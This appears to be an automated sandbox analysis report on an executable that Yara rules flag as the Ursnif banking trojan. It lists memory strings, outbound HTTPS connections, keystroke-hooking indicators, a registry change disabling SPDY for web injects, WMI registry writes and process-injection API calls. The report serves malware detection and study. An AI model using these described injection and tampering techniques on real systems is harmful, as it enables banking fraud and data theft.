Source: FpYf5EGDO9.exe, 00000000.00000003.351362297.0000000002289000.00000004.00000001.sdmp String found in binary or memory: <noscript><META http-equiv="refresh" content="0;URL='https://www.yahoo.com/?err=404&err_url=https%3a%2f%2fwww.yahoo.com%2fjdraw%2fHHAQ457B0GtLskLkv%2fZizh9TthhcPc%2fxT0iS3Qjl7y%2fkpH0MqC4dszB3H%2fHWmjHuRTfALKqcqKHLe5h%2f5KAnfOS4i_2BLVi7%2f2L64u5xwvTf3sXp%2fUrLoeHhSH12GKB9jsQ%2f3izuuqgp_%2f2BeydbeuNgrndFBMAfCQ%2fMxSWsDqksAzA_2F87xp%2fN1In9Bv1C1YQS1KkwHJ10H%2fTNNv.crw'"></noscript> equals www.yahoo.com (Yahoo)
Source: FpYf5EGDO9.exe, 00000000.00000003.351373141.0000000002246000.00000004.00000001.sdmp String found in binary or memory: https://www.yahoo.com/ GlobalSign Root CA-R2 equals www.yahoo.com (Yahoo)
Source: FpYf5EGDO9.exe, 00000000.00000003.450513651.0000000002240000.00000004.00000001.sdmp String found in binary or memory: https://www.yahoo.com/ equals www.yahoo.com (Yahoo)
Source: FpYf5EGDO9.exe, 00000000.00000003.351373141.0000000002246000.00000004.00000001.sdmp String found in binary or memory: https://www.yahoo.com// equals www.yahoo.com (Yahoo)
Source: FpYf5EGDO9.exe, 00000000.00000003.450513651.0000000002240000.00000004.00000001.sdmp String found in binary or memory: https://www.yahoo.com/R equals www.yahoo.com (Yahoo)
Source: FpYf5EGDO9.exe, 00000000.00000003.351373141.0000000002246000.00000004.00000001.sdmp String found in binary or memory: https://www.yahoo.com/[ equals www.yahoo.com (Yahoo)
Source: FpYf5EGDO9.exe, 00000000.00000003.450513651.0000000002240000.00000004.00000001.sdmp String found in binary or memory: https://www.yahoo.com/jdraw/HHAQ457B0GtLskLkv/Zizh9TthhcPc/xT0iS3Qjl7y/kpH0MqC4dszB3H/HWmjHuRTfALKqcqKHLe5h/5KAnfOS4i_2BLVi7/2L64u5xwvTf3sXp/UrLoeHhSH12GKB9jsQ/3izuuqgp_/2BeydbeuNgrndFBMAfCQ/MxSWsDqksAzA_2F87xp/N1In9Bv1C1YQS1KkwHJ10H/TNNv.crw equals www.yahoo.com (Yahoo)
Source: FpYf5EGDO9.exe, 00000000.00000003.351373141.0000000002246000.00000004.00000001.sdmp String found in binary or memory: https://www.yahoo.com/u equals www.yahoo.com (Yahoo)
Source: FpYf5EGDO9.exe, 00000000.00000003.351362297.0000000002289000.00000004.00000001.sdmp String found in binary or memory: s://www.yahoo.com/jdraw/HHAQ457B0GtLskLkv/Zizh9TthhcPc/xT0iS3Qjl7y/kpH0MqC4dszB3H/HWmjHuRTfALKqcqKHLe5h/5KAnfOS4i_2BLVi7/2L64u5xwvTf3sXp/UrLoeHhSH12GKB9jsQ/3izuuqgp_/2BeydbeuNgrndFBMAfCQ/MxSWsDqksAzA_2F87xp/N1In9Bv1C1YQS1KkwHJ10H/TNNv.crw equals www.yahoo.com (Yahoo)
Source: FpYf5EGDO9.exe, 00000000.00000003.351373141.0000000002246000.00000004.00000001.sdmp String found in binary or memory: s://www.yahoo.com/jdraw/HHAQ457B0GtLskLkv/Zizh9TthhcPc/xT0iS3Qjl7y/kpH0MqC4dszB3H/HWmjHuRTfALKqcqKHLe5h/5KAnfOS4i_2BLVi7/2L64u5xwvTf3sXp/UrLoeHhSH12GKB9jsQ/3izuuqgp_/2BeydbeuNgrndFBMAfCQ/MxSWsDqksAzA_2F87xp/N1In9Bv1C1YQS1KkwHJ10H/TNNv.crwv/CCpK equals www.yahoo.com (Yahoo)
Source: FpYf5EGDO9.exe, 00000000.00000003.351373141.0000000002246000.00000004.00000001.sdmp String found in binary or memory: s://www.yahoo.com/jdraw/HHAQ457B0GtLskLkv/Zizh9TthhcPc/xT0iS3Qjl7y/kpH0MqC4dszB3H/HWmjHuRTfALKqcqKHLe5h/5KAnfOS4i_2BLVi7/2L64u5xwvTf3sXp/UrLoeHhSH12GKB9jsQ/3izuuqgp_/2BeydbeuNgrndFBMAfCQ/MxSWsDqksAzA_2F87xp/N1In9Bv1C1YQS1KkwHJ10H/TNNv.crwx equals www.yahoo.com (Yahoo)
Source: FpYf5EGDO9.exe, 00000000.00000003.450513651.0000000002240000.00000004.00000001.sdmp String found in binary or memory: var u='https://www.yahoo.com/?err=404&err_url=https%3a%2f%2fwww.yahoo.com%2fj equals www.yahoo.com (Yahoo)
Source: FpYf5EGDO9.exe, 00000000.00000003.351373141.0000000002246000.00000004.00000001.sdmp String found in binary or memory: var u='https://www.yahoo.com/?err=404&err_url=https%3a%2f%2fwww.yahoo.com%2fjdraw%2fHHAQ457B0GtLskLkv%2fZizh9TthhcPc%2fxT0iS3Qjl7y%2fkpH0MqC4dszB3H%2fHWmjHuRTfALKqcqKHLe5h%2f5KAnfOS4i_2BLVi7%2f2L64u5xwvTf3sXp%2fUrLoeHhSH12GKB9jsQ%2f3izuuqgp_%2f2BeydbeuNgrndFBMAfCQ%2fMxSWsDqksAzA_2F87xp%2fN1In9Bv1C1YQS1KkwHJ10H%2fTNNv.crw'; equals www.yahoo.com (Yahoo)
Source: FpYf5EGDO9.exe, 00000000.00000003.450513651.0000000002240000.00000004.00000001.sdmp String found in binary or memory: www.yahoo.com equals www.yahoo.com (Yahoo)
Source: FpYf5EGDO9.exe, 00000000.00000003.351373141.0000000002246000.00000004.00000001.sdmp String found in binary or memory: www.yahoo.com/jdraw/HHAQ457B0GtLskLkv/Zizh9TthhcPc/xT0iS3Qjl7y/kpH0MqC4dszB3H/HWmjHuRTfALKqcqKHLe5h/5KAnfOS4i_2BLVi7/2L64u5xwvTf3sXp/UrLoeHhSH12GKB9jsQ/3izuuqgp_/2BeydbeuNgrndFBMAfCQ/MxSWsDqksAzA_2F87xp/N1In9Bv1C1YQS1KkwHJ10H/TNNv.crw equals www.yahoo.com (Yahoo)
Source: FpYf5EGDO9.exe, 00000000.00000003.351373141.0000000002246000.00000004.00000001.sdmp String found in binary or memory: www.yahoo.com7 equals www.yahoo.com (Yahoo)
Source: FpYf5EGDO9.exe, 00000000.00000003.450513651.0000000002240000.00000004.00000001.sdmp String found in binary or memory: www.yahoo.comB equals www.yahoo.com (Yahoo)
Source: FpYf5EGDO9.exe, 00000000.00000003.450513651.0000000002240000.00000004.00000001.sdmp String found in binary or memory: www.yahoo.comE equals www.yahoo.com (Yahoo)
Source: FpYf5EGDO9.exe, 00000000.00000003.351373141.0000000002246000.00000004.00000001.sdmp String found in binary or memory: www.yahoo.comZ equals www.yahoo.com (Yahoo)
Source: FpYf5EGDO9.exe, 00000000.00000003.351373141.0000000002246000.00000004.00000001.sdmp String found in binary or memory: www.yahoo.comows\system32\jsproxy.dll equals www.yahoo.com (Yahoo)
Source: FpYf5EGDO9.exe, 00000000.00000003.450513651.0000000002240000.00000004.00000001.sdmp String found in binary or memory: www.yahoo.comzD( equals www.yahoo.com (Yahoo)
Source: FpYf5EGDO9.exe, 00000000.00000002.510275033.00000000021CA000.00000004.00000001.sdmp String found in binary or memory: www.yahoo.com{ equals www.yahoo.com (Yahoo)
Source: unknown HTTPS traffic detected: 74.6.143.26:443 -> 192.168.2.3:49747 version: TLS 1.2
Source: unknown HTTPS traffic detected: 87.248.100.216:443 -> 192.168.2.3:49748 version: TLS 1.2
Source: unknown HTTPS traffic detected: 89.44.9.140:443 -> 192.168.2.3:49751 version: TLS 1.2
Source: unknown HTTPS traffic detected: 209.202.254.90:443 -> 192.168.2.3:49817 version: TLS 1.2
Source: unknown HTTPS traffic detected: 209.202.254.90:443 -> 192.168.2.3:49818 version: TLS 1.2
Source: unknown HTTPS traffic detected: 87.248.118.22:443 -> 192.168.2.3:49820 version: TLS 1.2
Source: unknown HTTPS traffic detected: 212.82.100.140:443 -> 192.168.2.3:49821 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif
Source: Yara match File source: 0000000E.00000003.484252773.000001A99926C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002C.00000003.696288190.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002C.00000002.698116221.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000002.820256805.0000027741E02000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000002.823251492.000001EAE4A02000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000002C.00000003.696063794.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.397698170.00000000046FC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002C.00000003.696408888.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000003.539185713.000001B88940C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000002.826107639.000001B91FF02000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.351603382.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002C.00000003.696253842.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000003.539264556.000001B88940C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.463766511.00000227E5BFC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.540966391.000001B88940C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.397157084.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.351549542.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.449933365.0000000005C38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.351505235.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.542615243.00000227E5BFC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.531429519.00000227E5BFC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000002.829961859.00000163C5A02000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000002C.00000003.696348362.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002C.00000003.696117374.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000003.463832492.00000227E5BFC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.351619714.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002C.00000003.696320291.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002C.00000003.696213478.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.396094392.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.351527418.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.351580737.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002C.00000003.696160386.0000000003DF8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.351432716.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.351478648.00000000048F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: FpYf5EGDO9.exe PID: 5556, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: powershell.exe PID: 4856, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: control.exe PID: 2904, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 4084, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 6080, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 4176, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 4440, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 4544, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: cmd.exe PID: 6088, type: MEMORYSTR
Source: Yara match File source: 0.3.FpYf5EGDO9.exe.43394a0.11.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.FpYf5EGDO9.exe.48794a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.FpYf5EGDO9.exe.47fa4a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.FpYf5EGDO9.exe.47fa4a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.FpYf5EGDO9.exe.3c40000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.FpYf5EGDO9.exe.43394a0.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.FpYf5EGDO9.exe.48a4ef8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000001F.00000000.537482070.000001B888D00000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000000.646320070.000001EAE4570000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000000.536149519.000001B888D00000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000000.614869233.00000163C5170000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000000.638980317.000001EAE4570000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000000.461568150.0000000000A30000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000000.658606689.0000027741BA0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.511067245.0000000004500000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000000.564696264.000001B920020000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.592498182.000001A99050B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000000.642623861.000001EAE4570000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000000.557126032.000001B920020000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.508974340.0000000004339000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000000.569957507.000001B920020000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000000.462780080.0000000000A30000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000000.534786772.000001B888D00000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000000.660520120.0000027741BA0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.397014247.00000000047FA000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.397054517.0000000004879000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000000.601911502.00000163C5170000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000000.656936601.0000027741BA0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000000.459559350.0000000000A30000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000000.608382094.00000163C5170000.00000040.00020000.sdmp, type: MEMORY
Creates a DirectInput object (often for capturing keystrokes)
Source: FpYf5EGDO9.exe, 00000000.00000002.510175221.00000000021AA000.00000004.00000020.sdmp Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

Yara detected Ursnif
Disables SPDY (HTTP compression, likely to perform web injects)
Source: C:\Windows\explorer.exe Registry key value created / modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings EnableSPDY3_0 0

System Summary:

Writes or reads registry keys via WMI
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Writes registry values via WMI
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Detected potential crypto function
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe Code function: 0_2_03C4AFC0 0_2_03C4AFC0
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe Code function: 0_2_03C47FBE 0_2_03C47FBE
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe Code function: 0_2_03C4836E 0_2_03C4836E
Source: C:\Windows\System32\control.exe Code function: 21_2_00A559E4 21_2_00A559E4
Source: C:\Windows\System32\control.exe Code function: 21_2_00A57548 21_2_00A57548
Source: C:\Windows\System32\control.exe Code function: 21_2_00A3C3E4 21_2_00A3C3E4
Source: C:\Windows\System32\control.exe Code function: 21_2_00A39098 21_2_00A39098
Source: C:\Windows\System32\control.exe Code function: 21_2_00A35420 21_2_00A35420
Source: C:\Windows\System32\control.exe Code function: 21_2_00A4C400 21_2_00A4C400
Source: C:\Windows\System32\control.exe Code function: 21_2_00A44818 21_2_00A44818
Source: C:\Windows\System32\control.exe Code function: 21_2_00A50468 21_2_00A50468
Source: C:\Windows\System32\control.exe Code function: 21_2_00A3847C 21_2_00A3847C
Source: C:\Windows\System32\control.exe Code function: 21_2_00A41C44 21_2_00A41C44
Source: C:\Windows\System32\control.exe Code function: 21_2_00A58448 21_2_00A58448
Source: C:\Windows\System32\control.exe Code function: 21_2_00A365A8 21_2_00A365A8
Source: C:\Windows\System32\control.exe Code function: 21_2_00A329B0 21_2_00A329B0
Source: C:\Windows\System32\control.exe Code function: 21_2_00A591B0 21_2_00A591B0
Source: C:\Windows\System32\control.exe Code function: 21_2_00A4CDC4 21_2_00A4CDC4
Source: C:\Windows\System32\control.exe Code function: 21_2_00A40DC8 21_2_00A40DC8
Source: C:\Windows\System32\control.exe Code function: 21_2_00A4B1D0 21_2_00A4B1D0
Source: C:\Windows\System32\control.exe Code function: 21_2_00A4993C 21_2_00A4993C
Source: C:\Windows\System32\control.exe Code function: 21_2_00A53D68 21_2_00A53D68
Source: C:\Windows\System32\control.exe Code function: 21_2_00A48974 21_2_00A48974
Source: C:\Windows\System32\control.exe Code function: 21_2_00A59AA8 21_2_00A59AA8
Source: C:\Windows\System32\control.exe Code function: 21_2_00A45AB4 21_2_00A45AB4
Source: C:\Windows\System32\control.exe Code function: 21_2_00A3AAB4 21_2_00A3AAB4
Source: C:\Windows\System32\control.exe Code function: 21_2_00A42A90 21_2_00A42A90
Source: C:\Windows\System32\control.exe Code function: 21_2_00A4DEE8 21_2_00A4DEE8
Source: C:\Windows\System32\control.exe Code function: 21_2_00A452D0 21_2_00A452D0
Source: C:\Windows\System32\control.exe Code function: 21_2_00A31638 21_2_00A31638
Source: C:\Windows\System32\control.exe Code function: 21_2_00A4220C 21_2_00A4220C
Source: C:\Windows\System32\control.exe Code function: 21_2_00A35A1C 21_2_00A35A1C
Source: C:\Windows\System32\control.exe Code function: 21_2_00A477A0 21_2_00A477A0
Source: C:\Windows\System32\control.exe Code function: 21_2_00A3CFF8 21_2_00A3CFF8
Source: C:\Windows\System32\control.exe Code function: 21_2_00A39FC4 21_2_00A39FC4
Source: C:\Windows\System32\control.exe Code function: 21_2_00A33764 21_2_00A33764
Source: C:\Windows\System32\control.exe Code function: 21_2_00A5137C 21_2_00A5137C
Source: C:\Windows\System32\control.exe Code function: 21_2_00A51B4C 21_2_00A51B4C
Source: C:\Windows\System32\rundll32.exe Code function: 31_2_000001B888D27548 31_2_000001B888D27548
Source: C:\Windows\System32\rundll32.exe Code function: 31_2_000001B888D259E4 31_2_000001B888D259E4
Source: C:\Windows\System32\rundll32.exe Code function: 31_2_000001B888D2137C 31_2_000001B888D2137C
Source: C:\Windows\System32\rundll32.exe Code function: 31_2_000001B888D177A0 31_2_000001B888D177A0
Source: C:\Windows\System32\rundll32.exe Code function: 31_2_000001B888D21B4C 31_2_000001B888D21B4C
Source: C:\Windows\System32\rundll32.exe Code function: 31_2_000001B888D03764 31_2_000001B888D03764
Source: C:\Windows\System32\rundll32.exe Code function: 31_2_000001B888D152D0 31_2_000001B888D152D0
Source: C:\Windows\System32\rundll32.exe Code function: 31_2_000001B888D1DEE8 31_2_000001B888D1DEE8
Source: C:\Windows\System32\rundll32.exe Code function: 31_2_000001B888D0847C 31_2_000001B888D0847C
Source: C:\Windows\System32\rundll32.exe Code function: 31_2_000001B888D09098 31_2_000001B888D09098
Source: C:\Windows\System32\rundll32.exe Code function: 31_2_000001B888D28448 31_2_000001B888D28448
Source: C:\Windows\System32\rundll32.exe Code function: 31_2_000001B888D11C44 31_2_000001B888D11C44
Source: C:\Windows\System32\rundll32.exe Code function: 31_2_000001B888D20468 31_2_000001B888D20468
Source: C:\Windows\System32\rundll32.exe Code function: 31_2_000001B888D0CFF8 31_2_000001B888D0CFF8
Source: C:\Windows\System32\rundll32.exe Code function: 31_2_000001B888D1C400 31_2_000001B888D1C400
Source: C:\Windows\System32\rundll32.exe Code function: 31_2_000001B888D14818 31_2_000001B888D14818
Source: C:\Windows\System32\rundll32.exe Code function: 31_2_000001B888D05420 31_2_000001B888D05420
Source: C:\Windows\System32\rundll32.exe Code function: 31_2_000001B888D09FC4 31_2_000001B888D09FC4
Source: C:\Windows\System32\rundll32.exe Code function: 31_2_000001B888D0C3E4 31_2_000001B888D0C3E4
Source: C:\Windows\System32\rundll32.exe Code function: 31_2_000001B888D065A8 31_2_000001B888D065A8
Source: C:\Windows\System32\rundll32.exe Code function: 31_2_000001B888D029B0 31_2_000001B888D029B0
Source: C:\Windows\System32\rundll32.exe Code function: 31_2_000001B888D291B0 31_2_000001B888D291B0
Source: C:\Windows\System32\rundll32.exe Code function: 31_2_000001B888D1993C 31_2_000001B888D1993C
Source: C:\Windows\System32\rundll32.exe Code function: 31_2_000001B888D23D68 31_2_000001B888D23D68
Source: C:\Windows\System32\rundll32.exe Code function: 31_2_000001B888D18974 31_2_000001B888D18974
Source: C:\Windows\System32\rundll32.exe Code function: 31_2_000001B888D12A90 31_2_000001B888D12A90
Source: C:\Windows\System32\rundll32.exe Code function: 31_2_000001B888D29AA8 31_2_000001B888D29AA8
Source: C:\Windows\System32\rundll32.exe Code function: 31_2_000001B888D0AAB4 31_2_000001B888D0AAB4
Source: C:\Windows\System32\rundll32.exe Code function: 31_2_000001B888D15AB4 31_2_000001B888D15AB4
Source: C:\Windows\System32\rundll32.exe Code function: 31_2_000001B888D01638 31_2_000001B888D01638
Source: C:\Windows\System32\rundll32.exe Code function: 31_2_000001B888D1220C 31_2_000001B888D1220C
Source: C:\Windows\System32\rundll32.exe Code function: 31_2_000001B888D05A1C 31_2_000001B888D05A1C
Source: C:\Windows\System32\rundll32.exe Code function: 31_2_000001B888D10DC8 31_2_000001B888D10DC8
Source: C:\Windows\System32\rundll32.exe Code function: 31_2_000001B888D1B1D0 31_2_000001B888D1B1D0
Source: C:\Windows\System32\rundll32.exe Code function: 31_2_000001B888D1CDC4 31_2_000001B888D1CDC4
Source: C:\Windows\System32\rundll32.exe Code function: 31_2_000001B888D3B5A4 31_2_000001B888D3B5A4
Source: C:\Windows\SysWOW64\cmd.exe Code function: 44_2_037413FA 44_2_037413FA
Source: C:\Windows\SysWOW64\cmd.exe Code function: 44_2_0374B006 44_2_0374B006
Searches for the Microsoft Outlook file path
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
PE file contains strange resources
Source: FpYf5EGDO9.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Uses 32bit PE files
Source: FpYf5EGDO9.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Contains functionality to call native functions
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe Code function: 0_2_00401703 NtMapViewOfSection, 0_2_00401703
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe Code function: 0_2_00401C90 GetProcAddress,NtCreateSection,memset, 0_2_00401C90
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe Code function: 0_2_004019A0 NtQuerySystemInformation,Sleep,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,CreateThread,GetLastError,QueueUserAPC,CloseHandle,GetLastError,TerminateThread,CloseHandle,SetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError, 0_2_004019A0
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe Code function: 0_2_03C45CD1 GetProcAddress,NtCreateSection,memset, 0_2_03C45CD1
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe Code function: 0_2_03C49E79 NtMapViewOfSection, 0_2_03C49E79
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe Code function: 0_2_03C49A0F NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, 0_2_03C49A0F
Source: C:\Users\user\Desktop\FpYf5EGDO9.exe Code function: 0_2_03C4B1E5 NtQueryVirtualMemory, 0_2_03C4B1E5
Source: C:\Windows\System32\control.exe Code function: 21_2_00A4B080 NtMapViewOfSection, 21_2_00A4B080
Source: C:\Windows\System32\control.exe Code function: 21_2_00A474E0 RtlAllocateHeap,NtQueryInformationProcess, 21_2_00A474E0
Source: C:\Windows\System32\control.exe Code function: 21_2_00A570F8 NtCreateSection, 21_2_00A570F8
Source: C:\Windows\System32\control.exe Code function: 21_2_00A48078 NtSetInformationProcess,CreateRemoteThread,ResumeThread,FindCloseChangeNotification, 21_2_00A48078
Source: C:\Windows\System32\control.exe Code function: 21_2_00A48844 NtWriteVirtualMemory, 21_2_00A48844
Source: C:\Windows\System32\control.exe Code function: 21_2_00A43104 NtAllocateVirtualMemory, 21_2_00A43104
Source: C:\Windows\System32\control.exe Code function: 21_2_00A4B164 NtQueryInformationProcess, 21_2_00A4B164
Source: C:\Windows\System32\control.exe Code function: 21_2_00A3B964 NtReadVirtualMemory, 21_2_00A3B964
Source: C:\Windows\System32\control.exe Code function: 21_2_00A54200 NtQueryInformationToken,NtQueryInformationToken,NtClose, 21_2_00A54200
Source: C:\Windows\System32\control.exe Code function: 21_2_00A3C3E4 NtSetContextThread,NtUnmapViewOfSection,NtClose, 21_2_00A3C3E4
Source: C:\Windows\System32\control.exe Code function: 21_2_00A6B00B NtProtectVirtualMemory,NtProtectVirtualMemory, 21_2_00A6B00B
Source: C:\Windows\System32\rundll32.exe Code function: 31_2_000001B888D1B164 NtQueryInformationProcess, 31_2_000001B888D1B164
Source: C:\Windows\System32\rundll32.exe Code function: 31_2_000001B888D24200 NtQueryInformationToken,NtQueryInformationToken,NtClose, 31_2_000001B888D24200
Source: C:\Windows\System32\rundll32.exe Code function: 31_2_000001B888D3B00B NtProtectVirtualMemory,NtProtectVirtualMemory, 31_2_000001B888D3B00B
Source: C:\Windows\SysWOW64\cmd.exe Code function: 44_2_037407E8 NtQueryInformationProcess, 44_2_037407E8
Source: C:\Windows\SysWOW64\cmd.exe Code function: 44_2_0373B347 OpenProcess,GetLastError,NtSetInformationProcess,RtlNtStatusToDosError,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle, 44_2_0373B347
